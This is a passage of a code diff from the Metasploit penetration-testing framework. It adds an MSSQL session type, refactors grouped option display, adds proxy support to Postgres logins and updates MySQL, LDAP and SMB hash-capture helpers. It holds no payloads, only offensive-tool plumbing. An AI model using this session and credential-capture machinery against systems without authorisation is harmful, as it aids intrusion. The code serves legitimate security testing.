mysql_conn = ::Mysql.connect(host, credential.public, credential.private, '', port, io: self.sock)
|
||||
|
||||
rescue ::SystemCallError, Rex::ConnectionError => e
|
||||
result_options.merge!({
|
||||
|
||||
@@ -45,7 +45,7 @@ module Metasploit
|
||||
pg_conn = nil
|
||||
|
||||
begin
|
||||
pg_conn = Msf::Db::PostgresPR::Connection.new(db_name,credential.public,credential.private,uri)
|
||||
pg_conn = Msf::Db::PostgresPR::Connection.new(db_name,credential.public,credential.private,uri,proxies)
|
||||
rescue ::RuntimeError => e
|
||||
case e.to_s.split("\t")[1]
|
||||
when "C3D000"
|
||||
|
||||
@@ -32,7 +32,7 @@ module Metasploit
|
||||
end
|
||||
end
|
||||
|
||||
VERSION = "6.3.55"
|
||||
VERSION = "6.3.57"
|
||||
MAJOR, MINOR, PATCH = VERSION.split('.').map { |x| x.to_i }
|
||||
PRERELEASE = 'dev'
|
||||
HASH = get_hash
|
||||
|
||||
@@ -228,6 +228,13 @@ class Config < Hash
|
||||
self.new.postgresql_session_history
|
||||
end
|
||||
|
||||
# Returns the full path to the MSSQL session history file.
|
||||
#
|
||||
# @return [String] path to the history file.
|
||||
def self.mssql_session_history
|
||||
self.new.mssql_session_history
|
||||
end
|
||||
|
||||
# Returns the full path to the MySQL session history file.
|
||||
#
|
||||
# @return [String] path to the history file.
|
||||
@@ -352,6 +359,10 @@ class Config < Hash
|
||||
config_directory + FileSep + "mysql_session_history"
|
||||
end
|
||||
|
||||
def mssql_session_history
|
||||
config_directory + FileSep + "mssql_session_history"
|
||||
end
|
||||
|
||||
def pry_history
|
||||
config_directory + FileSep + "pry_history"
|
||||
end
|
||||
|
||||
@@ -568,116 +568,96 @@ class ReadableText
|
||||
# @param indent [String] the indentation to use.
|
||||
# @param missing [Boolean] dump only empty required options.
|
||||
# @return [String] the string form of the information.
|
||||
def self.dump_options(mod, indent = '', missing = false)
|
||||
options = mod.options.map { |_name, option| option }
|
||||
options_grouped_by_conditions = options.group_by(&:conditions)
|
||||
def self.dump_options(mod, indent = '', missing = false, advanced: false, evasion: false)
|
||||
filtered_options = mod.options.values.select { |opt| opt.advanced? == advanced && opt.evasion? == evasion }
|
||||
|
||||
options_with_conditions = ''.dup
|
||||
options_without_conditions = ''.dup
|
||||
option_groups = mod.options.groups.map { |_name, group| group }.sort_by(&:name)
|
||||
options_by_group = option_groups.map do |group|
|
||||
[group, group.option_names.map { |name| mod.options[name] }.compact]
|
||||
end.to_h
|
||||
grouped_option_names = option_groups.flat_map(&:option_names)
|
||||
remaining_options = filtered_options.reject { |option| grouped_option_names.include?(option.name) }
|
||||
options_grouped_by_conditions = remaining_options.group_by(&:conditions)
|
||||
|
||||
options_grouped_by_conditions.each do |conditions, options|
|
||||
tbl = Rex::Text::Table.new(
|
||||
'Indent' => indent.length,
|
||||
'Columns' =>
|
||||
[
|
||||
'Name',
|
||||
'Current Setting',
|
||||
'Required',
|
||||
'Description'
|
||||
])
|
||||
option_tables = []
|
||||
|
||||
options.sort_by(&:name).each do |opt|
|
||||
name = opt.name
|
||||
if mod.datastore.is_a?(Msf::DataStoreWithFallbacks)
|
||||
val = mod.datastore[name]
|
||||
else
|
||||
val = mod.datastore[name].nil? ? opt.default : mod.datastore[name]
|
||||
end
|
||||
options_grouped_by_conditions.sort.each do |conditions, options|
|
||||
tbl = options_table(missing, mod, options, indent)
|
||||
|
||||
next if (opt.advanced?)
|
||||
next if (opt.evasion?)
|
||||
next if (missing && opt.valid?(val))
|
||||
|
||||
desc = opt.desc.dup
|
||||
|
||||
# Hint at RPORT proto by regexing mixins
|
||||
if name == 'RPORT' && opt.kind_of?(Msf::OptPort)
|
||||
mod.class.included_modules.each do |m|
|
||||
case m.name
|
||||
when /tcp/i, /HttpClient$/
|
||||
desc << ' (TCP)'
|
||||
break
|
||||
when /udp/i
|
||||
desc << ' (UDP)'
|
||||
break
|
||||
end
|
||||
end
|
||||
end
|
||||
|
||||
tbl << [ name, opt.display_value(val), opt.required? ? "yes" : "no", desc ]
|
||||
end
|
||||
|
||||
next if conditions.any? && tbl.rows.empty?
|
||||
next if tbl.rows.empty?
|
||||
|
||||
if conditions.any?
|
||||
options_with_conditions << "\n\n#{indent}When #{Msf::OptCondition.format_conditions(mod, options.first)}:\n\n"
|
||||
options_with_conditions << tbl.to_s
|
||||
option_tables << "#{indent}When #{Msf::OptCondition.format_conditions(mod, options.first)}:\n\n#{tbl}"
|
||||
else
|
||||
options_without_conditions << tbl.to_s
|
||||
option_tables << tbl.to_s
|
||||
end
|
||||
end
|
||||
|
||||
result = "#{options_without_conditions}#{options_with_conditions}"
|
||||
options_by_group.each do |group, options|
|
||||
tbl = options_table(missing, mod, options, indent)
|
||||
option_tables << "#{indent}#{group.description}:\n\n#{tbl}"
|
||||
end
|
||||
|
||||
result = option_tables.join("\n\n")
|
||||
result
|
||||
end
|
||||
|
||||
# Creates the table for the given module options
|
||||
#
|
||||
# @param missing [Boolean] dump only empty required options.
|
||||
# @param mod [Msf::Module] the module.
|
||||
# @param options [Array<Msf::OptBase>] The options to be added to the table
|
||||
# @param indent [String] the indentation to use.
|
||||
#
|
||||
# @return [String] the string form of the table.
|
||||
def self.options_table(missing, mod, options, indent)
|
||||
tbl = Rex::Text::Table.new(
|
||||
'Indent' => indent.length,
|
||||
'Columns' =>
|
||||
[
|
||||
'Name',
|
||||
'Current Setting',
|
||||
'Required',
|
||||
'Description'
|
||||
]
|
||||
)
|
||||
options.sort_by(&:name).each do |opt|
|
||||
name = opt.name
|
||||
if mod.datastore.is_a?(Msf::DataStoreWithFallbacks)
|
||||
val = mod.datastore[name]
|
||||
else
|
||||
val = mod.datastore[name].nil? ? opt.default : mod.datastore[name]
|
||||
end
|
||||
next if (missing && opt.valid?(val))
|
||||
|
||||
desc = opt.desc.dup
|
||||
|
||||
# Hint at RPORT proto by regexing mixins
|
||||
if name == 'RPORT' && opt.kind_of?(Msf::OptPort)
|
||||
mod.class.included_modules.each do |m|
|
||||
case m.name
|
||||
when /tcp/i, /HttpClient$/
|
||||
desc << ' (TCP)'
|
||||
break
|
||||
when /udp/i
|
||||
desc << ' (UDP)'
|
||||
break
|
||||
end
|
||||
end
|
||||
end
|
||||
|
||||
tbl << [name, opt.display_value(val), opt.required? ? "yes" : "no", desc]
|
||||
end
|
||||
tbl
|
||||
end
|
||||
|
||||
# Dumps the advanced options associated with the supplied module.
|
||||
#
|
||||
# @param mod [Msf::Module] the module.
|
||||
# @param indent [String] the indentation to use.
|
||||
# @return [String] the string form of the information.
|
||||
def self.dump_advanced_options(mod, indent = '')
|
||||
options = mod.options.map { |_name, option| option }
|
||||
options_grouped_by_conditions = options.group_by(&:conditions)
|
||||
|
||||
options_with_conditions = ''.dup
|
||||
options_without_conditions = ''.dup
|
||||
|
||||
options_grouped_by_conditions.each do |conditions, options|
|
||||
tbl = Rex::Text::Table.new(
|
||||
'Indent' => indent.length,
|
||||
'Columns' =>
|
||||
[
|
||||
'Name',
|
||||
'Current Setting',
|
||||
'Required',
|
||||
'Description'
|
||||
])
|
||||
|
||||
options.sort_by(&:name).each do |opt|
|
||||
next unless opt.advanced?
|
||||
|
||||
name = opt.name
|
||||
if mod.datastore.is_a?(Msf::DataStoreWithFallbacks)
|
||||
val = mod.datastore[name]
|
||||
else
|
||||
val = mod.datastore[name].nil? ? opt.default : mod.datastore[name]
|
||||
end
|
||||
tbl << [ name, opt.display_value(val), opt.required? ? "yes" : "no", opt.desc ]
|
||||
end
|
||||
|
||||
next if conditions.any? && tbl.rows.empty?
|
||||
|
||||
if conditions.any?
|
||||
options_with_conditions << "\n\n#{indent}Active when #{Msf::OptCondition.format_conditions(mod, options.first)}:\n\n"
|
||||
options_with_conditions << tbl.to_s
|
||||
else
|
||||
options_without_conditions << tbl.to_s
|
||||
end
|
||||
end
|
||||
|
||||
result = "#{options_without_conditions}#{options_with_conditions}"
|
||||
result
|
||||
return dump_options(mod, indent, advanced: true)
|
||||
end
|
||||
|
||||
# Dumps the evasion options associated with the supplied module.
|
||||
@@ -686,46 +666,7 @@ class ReadableText
|
||||
# @param indent [String] the indentation to use.
|
||||
# @return [String] the string form of the information.
|
||||
def self.dump_evasion_options(mod, indent = '')
|
||||
options = mod.options.map { |_name, option| option }
|
||||
options_grouped_by_conditions = options.group_by(&:conditions)
|
||||
|
||||
options_with_conditions = ''.dup
|
||||
options_without_conditions = ''.dup
|
||||
|
||||
options_grouped_by_conditions.each do |conditions, options|
|
||||
tbl = Rex::Text::Table.new(
|
||||
'Indent' => indent.length,
|
||||
'Columns' =>
|
||||
[
|
||||
'Name',
|
||||
'Current Setting',
|
||||
'Required',
|
||||
'Description'
|
||||
])
|
||||
|
||||
options.sort_by(&:name).each do |opt|
|
||||
next unless opt.evasion?
|
||||
|
||||
name = opt.name
|
||||
if mod.datastore.is_a?(Msf::DataStoreWithFallbacks)
|
||||
val = mod.datastore[name]
|
||||
else
|
||||
val = mod.datastore[name].nil? ? opt.default : mod.datastore[name]
|
||||
end
|
||||
tbl << [ name, opt.display_value(val), opt.required? ? "yes" : "no", opt.desc ]
|
||||
end
|
||||
|
||||
next if conditions.any? && tbl.rows.empty?
|
||||
|
||||
if conditions.any?
|
||||
options_with_conditions << "\n\n#{indent}When #{Msf::OptCondition.format_conditions(mod, options.first)}:\n\n"
|
||||
options_with_conditions << tbl.to_s
|
||||
else
|
||||
options_without_conditions << tbl.to_s
|
||||
end
|
||||
end
|
||||
result = "#{options_without_conditions}#{options_with_conditions}"
|
||||
result
|
||||
return dump_options(mod, indent, evasion: true)
|
||||
end
|
||||
|
||||
# Dumps the references associated with the supplied module.
|
||||
|
||||
@@ -15,9 +15,14 @@ module CommandShellOptions
|
||||
def initialize(info = {})
|
||||
super(info)
|
||||
|
||||
register_options(
|
||||
[
|
||||
OptBool.new('CreateSession', [false, 'Create a new session for every successful login', true])
|
||||
]
|
||||
)
|
||||
|
||||
register_advanced_options(
|
||||
[
|
||||
OptBool.new('CreateSession', [false, 'Create a new session for every successful login', true]),
|
||||
OptString.new('InitialAutoRunScript', "An initial script to run on session creation (before AutoRunScript)"),
|
||||
OptString.new('AutoRunScript', "A script to run automatically on session creation."),
|
||||
OptString.new('CommandShellCleanupCommand', "A command to run before the session is closed"),
|
||||
|
||||
@@ -0,0 +1,143 @@
|
||||
# -*- coding:binary -*-
|
||||
|
||||
require 'rex/post/mssql'
|
||||
|
||||
class Msf::Sessions::MSSQL
|
||||
|
||||
include Msf::Session::Basic
|
||||
include Msf::Sessions::Scriptable
|
||||
|
||||
# @return [Rex::Post::MSSQL::Ui::Console] The interactive console
|
||||
attr_accessor :console
|
||||
# @return [MSSQL::Client] The MSSQL client
|
||||
attr_accessor :client
|
||||
attr_accessor :platform, :arch
|
||||
attr_reader :framework
|
||||
|
||||
def initialize(rstream, opts = {})
|
||||
@client = opts.fetch(:client)
|
||||
self.console = Rex::Post::MSSQL::Ui::Console.new(self, opts)
|
||||
|
||||
super(rstream, opts)
|
||||
end
|
||||
|
||||
def bootstrap(datastore = {}, handler = nil)
|
||||
session = self
|
||||
session.init_ui(user_input, user_output)
|
||||
|
||||
@info = "MSSQL #{datastore['USERNAME']} @ #{@peer_info}"
|
||||
end
|
||||
|
||||
def execute_file(full_path, args)
|
||||
if File.extname(full_path) == '.rb'
|
||||
Rex::Script::Shell.new(self, full_path).run(args)
|
||||
else
|
||||
console.load_resource(full_path)
|
||||
end
|
||||
end
|
||||
|
||||
def process_autoruns(datastore)
|
||||
['InitialAutoRunScript', 'AutoRunScript'].each do |key|
|
||||
next if datastore[key].nil? || datastore[key].empty?
|
||||
|
||||
args = Shellwords.shellwords(datastore[key])
|
||||
print_status("Session ID #{self.sid} (#{self.tunnel_to_s}) processing #{key} '#{datastore[key]}'")
|
||||
self.execute_script(args.shift, *args)
|
||||
end
|
||||
end
|
||||
|
||||
def type
|
||||
self.class.type
|
||||
end
|
||||
|
||||
# Returns the type of session.
|
||||
#
|
||||
def self.type
|
||||
'mssql'
|
||||
end
|
||||
|
||||
def self.can_cleanup_files
|
||||
false
|
||||
end
|
||||
|
||||
#
|
||||
# Returns the session description.
|
||||
#
|
||||
def desc
|
||||
'MSSQL'
|
||||
end
|
||||
|
||||
def address
|
||||
return @address if @address
|
||||
|
||||
@address, @port = client.sock.peerinfo.split(':')
|
||||
@address
|
||||
end
|
||||
|
||||
def port
|
||||
return @port if @port
|
||||
|
||||
@address, @port = client.sock.peerinfo.split(':')
|
||||
@port
|
||||
end
|
||||
|
||||
##
|
||||
# :category: Msf::Session::Interactive implementors
|
||||
#
|
||||
# Initializes the console's I/O handles.
|
||||
#
|
||||
def init_ui(input, output)
|
||||
self.user_input = input
|
||||
self.user_output = output
|
||||
console.init_ui(input, output)
|
||||
console.set_log_source(log_source)
|
||||
|
||||
super
|
||||
end
|
||||
|
||||
##
|
||||
# :category: Msf::Session::Interactive implementors
|
||||
#
|
||||
# Resets the console's I/O handles.
|
||||
#
|
||||
def reset_ui
|
||||
console.unset_log_source
|
||||
console.reset_ui
|
||||
end
|
||||
|
||||
def exit
|
||||
console.stop
|
||||
end
|
||||
|
||||
##
|
||||
# :category: Msf::Session::Interactive implementors
|
||||
#
|
||||
# Override the basic session interaction to use shell_read and
|
||||
# shell_write instead of operating on rstream directly.
|
||||
def _interact
|
||||
framework.events.on_session_interact(self)
|
||||
framework.history_manager.with_context(name: type.to_sym) do
|
||||
_interact_stream
|
||||
end
|
||||
end
|
||||
|
||||
##
|
||||
# :category: Msf::Session::Interactive implementors
|
||||
#
|
||||
def _interact_stream
|
||||
framework.events.on_session_interact(self)
|
||||
|
||||
console.framework = framework
|
||||
# Call the console interaction of the MSSQL client and
|
||||
# pass it a block that returns whether or not we should still be
|
||||
# interacting. This will allow the shell to abort if interaction is
|
||||
# canceled.
|
||||
console.interact { interacting != true }
|
||||
console.framework = nil
|
||||
|
||||
# If the stop flag has been set, then that means the user exited. Raise
|
||||
# the EOFError so we can drop this handle like a bad habit.
|
||||
raise EOFError if (console.stopped? == true)
|
||||
end
|
||||
|
||||
end
|
||||
@@ -49,7 +49,7 @@ class Msf::Sessions::MySQL
|
||||
|
||||
# @return [String] The type of the session
|
||||
def self.type
|
||||
'MySQL'
|
||||
'mysql'
|
||||
end
|
||||
|
||||
# @return [Boolean] Can the session clean up after itself
|
||||
|
||||
@@ -57,7 +57,7 @@ class Msf::Sessions::PostgreSQL
|
||||
# @return [String] The type of the session
|
||||
#
|
||||
def self.type
|
||||
'PostgreSQL'
|
||||
'postgresql'
|
||||
end
|
||||
|
||||
#
|
||||
|
||||
@@ -57,7 +57,7 @@ class Msf::Sessions::SMB
|
||||
# Returns the type of session.
|
||||
#
|
||||
def self.type
|
||||
'SMB'
|
||||
'smb'
|
||||
end
|
||||
|
||||
def self.can_cleanup_files
|
||||
|
||||
@@ -342,7 +342,7 @@ class EncodedPayload
|
||||
wlog("#{pinst.refname}: Failed to find preferred nop #{reqs['Nop']}")
|
||||
end
|
||||
|
||||
nops.each_module { |nopname, nopmod|
|
||||
nops.each { |nopname, nopmod|
|
||||
# Create an instance of the nop module
|
||||
self.nop = nopmod.new
|
||||
|
||||
|
||||
@@ -142,6 +142,10 @@ class Encoder < Module
|
||||
# Bash brace expansion encoding.
|
||||
#
|
||||
CmdPosixBrace = 'brace'
|
||||
#
|
||||
# Base64 encoding.
|
||||
#
|
||||
CmdPosixBase64 = 'base64'
|
||||
end
|
||||
|
||||
#
|
||||
|
||||
@@ -183,7 +183,7 @@ module Enumeration
|
||||
end
|
||||
|
||||
def dns_get_ptr(ip)
|
||||
resp = dns_query(ip, nil)
|
||||
resp = dns_query(ip, 'PTR')
|
||||
return if resp.blank? || resp.answer.blank?
|
||||
|
||||
records = []
|
||||
@@ -227,7 +227,7 @@ module Enumeration
|
||||
srv_record_types.each do |srv_record_type|
|
||||
srv_protos.each do |srv_proto|
|
||||
srv_record = "_#{srv_record_type}._#{srv_proto}.#{domain}"
|
||||
resp = dns_query(srv_record, Net::DNS::SRV)
|
||||
resp = dns_query(srv_record, 'SRV')
|
||||
next if resp.blank? || resp.answer.blank?
|
||||
srv_record_data = []
|
||||
resp.answer.each do |r|
|
||||
|
||||
@@ -76,6 +76,13 @@ module Msf
|
||||
#
|
||||
def start_service
|
||||
comm = _determine_server_comm(bindhost)
|
||||
auth_handler = Rex::Proto::LDAP::Auth.new(
|
||||
datastore['CHALLENGE'],
|
||||
datastore['Domain'],
|
||||
datastore['Server'],
|
||||
datastore['DnsName'],
|
||||
datastore['DnsDomain']
|
||||
)
|
||||
self.service = Rex::ServiceManager.start(
|
||||
Rex::Proto::LDAP::Server,
|
||||
bindhost,
|
||||
@@ -84,6 +91,7 @@ module Msf
|
||||
datastore['LdapServerTcp'],
|
||||
read_ldif,
|
||||
comm,
|
||||
auth_handler,
|
||||
{ 'Msf' => framework, 'MsfExploit' => self }
|
||||
)
|
||||
|
||||
|
||||
@@ -17,6 +17,8 @@ module Exploit::Remote::MSSQL
|
||||
include Msf::Exploit::Remote::Kerberos::Ticket::Storage
|
||||
include Msf::Exploit::Remote::Kerberos::ServiceAuthenticator::Options
|
||||
|
||||
attr_accessor :mssql_client
|
||||
|
||||
#
|
||||
# Creates an instance of a MSSQL exploit module.
|
||||
#
|
||||
@@ -46,6 +48,11 @@ module Exploit::Remote::MSSQL
|
||||
register_autofilter_services(%W{ ms-sql-s ms-sql2000 sybase })
|
||||
end
|
||||
|
||||
def set_session(client)
|
||||
print_status("Using existing session #{session.sid}")
|
||||
@mssql_client = client
|
||||
end
|
||||
|
||||
#
|
||||
# This method sends a UDP query packet to the server and
|
||||
# parses out the reply packet into a hash
|
||||
|
||||
@@ -19,6 +19,10 @@ module Exploit::Remote::MYSQL
|
||||
|
||||
include Exploit::Remote::Tcp
|
||||
|
||||
# @!attribute [rw] mysql_conn
|
||||
# @return [::Mysql]
|
||||
attr_accessor :mysql_conn
|
||||
|
||||
def initialize(info = {})
|
||||
super
|
||||
|
||||
@@ -33,17 +37,13 @@ module Exploit::Remote::MYSQL
|
||||
end
|
||||
|
||||
def mysql_login(user='root', pass='', db=nil)
|
||||
unless defined?(session).nil? || session.nil?
|
||||
print_status("Using existing session #{session.sid}")
|
||||
@mysql_handle = session.client
|
||||
return true
|
||||
end
|
||||
|
||||
disconnect if self.sock
|
||||
disconnect if sock
|
||||
connect
|
||||
|
||||
begin
|
||||
@mysql_handle = ::Mysql.connect(rhost, user, pass, db, rport, io: sock)
|
||||
self.mysql_conn = ::Mysql.connect(rhost, user, pass, db, rport, io: sock)
|
||||
# Deprecating this in favor off `mysql_conn`
|
||||
@mysql_handle = ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy.new(self, :mysql_conn, :@mysql_handle, ActiveSupport::Deprecation.new)
|
||||
|
||||
rescue Errno::ECONNREFUSED
|
||||
print_error("Connection refused")
|
||||
@@ -62,20 +62,14 @@ module Exploit::Remote::MYSQL
|
||||
return false
|
||||
end
|
||||
|
||||
vprint_good "#{rhost}:#{rport} MySQL - Logged in to '#{db}' with '#{user}':'#{pass}'"
|
||||
vprint_good "#{mysql_conn.host}:#{mysql_conn.port} MySQL - Logged in to '#{db}' with '#{user}':'#{pass}'"
|
||||
|
||||
return true
|
||||
end
|
||||
|
||||
def mysql_logoff
|
||||
# Don't log out if we are using a session.
|
||||
if defined?(session) && session
|
||||
vprint_status "#{rhost}:#{rport} MySQL - Skipping disconnecting from the session"
|
||||
return
|
||||
end
|
||||
|
||||
@mysql_handle = nil if @mysql_handle
|
||||
disconnect if self.sock
|
||||
mysql_conn.close if mysql_conn
|
||||
disconnect if sock
|
||||
vprint_status "#{rhost}:#{rport} MySQL - Disconnected"
|
||||
end
|
||||
|
||||
@@ -92,7 +86,7 @@ module Exploit::Remote::MYSQL
|
||||
|
||||
def mysql_query(sql)
|
||||
begin
|
||||
res = @mysql_handle.query(sql)
|
||||
res = mysql_conn.query(sql)
|
||||
rescue ::Mysql::Error => e
|
||||
print_error("MySQL Error: #{e.class} #{e.to_s}")
|
||||
return nil
|
||||
@@ -101,7 +95,7 @@ module Exploit::Remote::MYSQL
|
||||
return nil
|
||||
end
|
||||
|
||||
vprint_status "#{rhost}:#{rport} MySQL - querying with '#{sql}'"
|
||||
vprint_status "#{mysql_conn.host}:#{mysql_conn.port} MySQL - querying with '#{sql}'"
|
||||
res
|
||||
end
|
||||
|
||||
|
||||
@@ -88,17 +88,13 @@ module Exploit::Remote::Postgres
|
||||
# @return [:error] if some other error occurred
|
||||
# @return [:connected] if everything went as planned
|
||||
def postgres_login(opts={})
|
||||
unless defined?(session).nil? || session.nil?
|
||||
self.postgres_conn = session.client
|
||||
return :connected
|
||||
end
|
||||
|
||||
postgres_logout if self.postgres_conn
|
||||
db = opts[:database] || datastore['DATABASE']
|
||||
username = opts[:username] || datastore['USERNAME']
|
||||
password = opts[:password] || datastore['PASSWORD']
|
||||
ip = opts[:server] || datastore['RHOST']
|
||||
port = opts[:port] || datastore['RPORT']
|
||||
proxies = opts[:proxies] || datastore['Proxies']
|
||||
uri = "tcp://#{ip}:#{port}"
|
||||
|
||||
if Rex::Socket.is_ipv6?(ip)
|
||||
@@ -107,7 +103,7 @@ module Exploit::Remote::Postgres
|
||||
|
||||
verbose = opts[:verbose] || datastore['VERBOSE']
|
||||
begin
|
||||
self.postgres_conn = Connection.new(db,username,password,uri)
|
||||
self.postgres_conn = Connection.new(db,username,password,uri,proxies)
|
||||
rescue RuntimeError => e
|
||||
case e.to_s.split("\t")[1]
|
||||
when "C3D000"
|
||||
@@ -125,7 +121,7 @@ module Exploit::Remote::Postgres
|
||||
return :connection_refused
|
||||
end
|
||||
if self.postgres_conn
|
||||
print_good "#{ip}:#{port} Postgres - Logged in to '#{db}' with '#{username}':'#{password}'" if verbose
|
||||
print_good "#{self.postgres_conn.address}:#{self.postgres_conn.port} Postgres - Logged in to '#{db}' with '#{username}':'#{password}'" if verbose
|
||||
return :connected
|
||||
end
|
||||
end
|
||||
@@ -134,20 +130,15 @@ module Exploit::Remote::Postgres
|
||||
#
|
||||
# @return [void]
|
||||
def postgres_logout
|
||||
ip = datastore['RHOST']
|
||||
port = datastore['RPORT']
|
||||
ip = self.postgres_conn.address
|
||||
port = self.postgres_conn.port
|
||||
verbose = datastore['VERBOSE']
|
||||
# Don't log out if we are using a session.
|
||||
if defined?(session) && session
|
||||
print_status "#{ip}:#{port} Postgres - Skipping disconnecting from the session" if verbose
|
||||
return
|
||||
end
|
||||
|
||||
if self.postgres_conn
|
||||
self.postgres_conn.close if(self.postgres_conn.kind_of?(Connection) && self.postgres_conn.instance_variable_get("@conn"))
|
||||
self.postgres_conn = nil
|
||||
print_status "#{ip}:#{port} Postgres - Disconnected" if verbose
|
||||
end
|
||||
print_status "#{ip}:#{port} Postgres - Disconnected" if verbose
|
||||
end
|
||||
|
||||
# If not currently connected, attempt to connect. If an
|
||||
@@ -158,17 +149,16 @@ module Exploit::Remote::Postgres
|
||||
# @param doprint [Boolean] Whether the result should be printed
|
||||
# @return [Hash]
|
||||
def postgres_query(sql=nil,doprint=false)
|
||||
ip = datastore['RHOST']
|
||||
port = datastore['RPORT']
|
||||
unless self.postgres_conn
|
||||
result = postgres_login
|
||||
unless result == :connected
|
||||
return { :conn_error => result }
|
||||
return { conn_error: result }
|
||||
end
|
||||
end
|
||||
|
||||
if self.postgres_conn
|
||||
sql ||= datastore['SQL']
|
||||
vprint_status "#{ip}:#{port} Postgres - querying with '#{sql}'"
|
||||
vprint_status "#{self.postgres_conn.address}:#{self.postgres_conn.port} Postgres - querying with '#{sql}'"
|
||||
begin
|
||||
resp = self.postgres_conn.query(sql)
|
||||
rescue RuntimeError => e
|
||||
@@ -202,12 +192,11 @@ module Exploit::Remote::Postgres
|
||||
# Otherwise, create a rowset using Rex::Text::Table (if there's
|
||||
# more than 0 rows) and return :complete.
|
||||
def postgres_print_reply(resp=nil,sql=nil)
|
||||
ip = datastore['RHOST']
|
||||
port = datastore['RPORT']
|
||||
verbose = datastore['VERBOSE']
|
||||
return :error unless resp.kind_of? Connection::Result
|
||||
|
||||
if resp.rows and resp.fields
|
||||
print_status "#{ip}:#{port} Rows Returned: #{resp.rows.size}" if verbose
|
||||
print_status "#{postgres_conn.address}:#{postgres_conn.port} Rows Returned: #{resp.rows.size}" if verbose
|
||||
if resp.rows.size > 0
|
||||
tbl = Rex::Text::Table.new(
|
||||
'Indent' => 4,
|
||||
|
||||
@@ -62,7 +62,7 @@ module Msf::Exploit::Remote::SMB::Server::HashCapture
|
||||
origin = create_credential_origin_service(
|
||||
{
|
||||
address: address,
|
||||
port: datastore['SRVPORT'],
|
||||
port: srvport,
|
||||
service_name: 'smb',
|
||||
protocol: 'tcp',
|
||||
module_fullname: fullname,
|
||||
@@ -74,7 +74,7 @@ module Msf::Exploit::Remote::SMB::Server::HashCapture
|
||||
origin: origin,
|
||||
origin_type: :service,
|
||||
address: address,
|
||||
port: datastore['SRVPORT'],
|
||||
port: srvport,
|
||||
service_name: 'smb',
|
||||
username: user,
|
||||
server_challenge: challenge,
|
||||
|
||||
@@ -27,7 +27,6 @@ module Msf
|
||||
|
||||
register_options(
|
||||
[
|
||||
OptPort.new('SRVPORT', [ true, 'The local port to listen on.', 445 ]),
|
||||
OptString.new('SHARE', [ false, 'Share (Default: random); cannot contain spaces or slashes'], regex: /^[^\s\/\\]*$/),
|
||||
OptString.new('FILE_NAME', [ false, 'File name to share (Default: random)']),
|
||||
OptString.new('FOLDER_NAME', [ false, 'Folder name to share (Default: none)'])
|
||||
|
||||
@@ -25,6 +25,7 @@ module Msf
|
||||
SMB_SESSION_TYPE = 'smb_session_type'
|
||||
POSTGRESQL_SESSION_TYPE = 'postgresql_session_type'
|
||||
MYSQL_SESSION_TYPE = 'mysql_session_type'
|
||||
MSSQL_SESSION_TYPE = 'mssql_session_type'
|
||||
DEFAULTS = [
|
||||
{
|
||||
name: WRAPPED_TABLES,
|
||||
@@ -83,6 +84,12 @@ module Msf
|
||||
requires_restart: true,
|
||||
default_value: false
|
||||
}.freeze,
|
||||
{
|
||||
name: MSSQL_SESSION_TYPE,
|
||||
description: 'When enabled will allow for the creation/use of mssql sessions',
|
||||
requires_restart: true,
|
||||
default_value: false
|
||||
}.freeze,
|
||||
{
|
||||
name: DNS_FEATURE,
|
||||
description: 'When enabled, allows configuration of DNS resolution behaviour in Metasploit',
|
||||
|
||||
@@ -242,41 +242,44 @@ module Msf::Module::Alert
|
||||
# with this method will not be displayed again.
|
||||
def alert_user
|
||||
self.you_have_been_warned ||= {}
|
||||
without_prompt do
|
||||
errors.each do |msg|
|
||||
if msg && !self.you_have_been_warned[msg.hash]
|
||||
print_error(msg, prefix: '')
|
||||
self.you_have_been_warned[msg.hash] = true
|
||||
end
|
||||
errors.each do |msg|
|
||||
if msg && !self.you_have_been_warned[msg.hash]
|
||||
without_prompt { print_error(msg, prefix: '') }
|
||||
self.you_have_been_warned[msg.hash] = true
|
||||
end
|
||||
end
|
||||
|
||||
warnings.each do |msg|
|
||||
if msg && !self.you_have_been_warned[msg.hash]
|
||||
print_warning(msg, prefix: '')
|
||||
self.you_have_been_warned[msg.hash] = true
|
||||
end
|
||||
warnings.each do |msg|
|
||||
if msg && !self.you_have_been_warned[msg.hash]
|
||||
without_prompt { print_warning(msg, prefix: '') }
|
||||
self.you_have_been_warned[msg.hash] = true
|
||||
end
|
||||
end
|
||||
|
||||
infos.each do |msg|
|
||||
if msg && !self.you_have_been_warned[msg.hash]
|
||||
# Make prefix an empty string to avoid adding clutter (timestamps, rhost, rport, etc.) to the output
|
||||
print_status(msg, prefix: '')
|
||||
self.you_have_been_warned[msg.hash] = true
|
||||
end
|
||||
infos.each do |msg|
|
||||
if msg && !self.you_have_been_warned[msg.hash]
|
||||
# Make prefix an empty string to avoid adding clutter (timestamps, rhost, rport, etc.) to the output
|
||||
without_prompt { print_status(msg, prefix: '') }
|
||||
self.you_have_been_warned[msg.hash] = true
|
||||
end
|
||||
end
|
||||
end
|
||||
|
||||
# Temporarily set the prompt mode to false to ensure that there are not additional lines printed
|
||||
# A workaround for the prompting bug spotted in https://github.com/rapid7/metasploit-framework/pull/18761#issuecomment-1916645095
|
||||
# Temporarily set the prompt mode to false to ensure that there are not additional lines printed
|
||||
# A workaround for the prompting bug spotted in https://github.com/rapid7/metasploit-framework/pull/18761#issuecomment-1916645095
|
||||
def without_prompt(&block)
|
||||
if user_output
|
||||
previous_prompting_value = user_output.prompting?
|
||||
user_output.prompting(false)
|
||||
end
|
||||
# Some user outputs cannot have their prompting value configured, i.e. WebConsolePipe
|
||||
return yield unless user_output.respond_to?(:prompting)
|
||||
|
||||
yield
|
||||
ensure
|
||||
user_output.prompting(previous_prompting_value) if user_output
|
||||
begin
|
||||
if user_output
|
||||
previous_prompting_value = user_output.prompting?
|
||||
user_output.prompting(false)
|
||||
end
|
||||
|
||||
yield
|
||||
ensure
|
||||
user_output.prompting(previous_prompting_value) if user_output
|
||||
end
|
||||
end
|
||||
end
|
||||
|
||||
@@ -67,4 +67,28 @@ module Msf::Module::Options
|
||||
self.options.add_options(options, owner)
|
||||
import_defaults(false)
|
||||
end
|
||||
|
||||
# Registers a new option group, merging options by default
|
||||
#
|
||||
# @param name [String] Name for the group
|
||||
# @param description [String] Description of the group
|
||||
# @param option_names [Array<String>] List of datastore option names
|
||||
# @param merge [Boolean] whether to merge or overwrite the groups option names
|
||||
def register_option_group(name:, description:, option_names: [], merge: true)
|
||||
existing_group = options.groups[name]
|
||||
if merge && existing_group
|
||||
existing_group.description = description
|
||||
existing_group.add_options(option_names)
|
||||
else
|
||||
option_group = Msf::OptionGroup.new(name: name, description: description, option_names: option_names)
|
||||
options.add_group(option_group)
|
||||
end
|
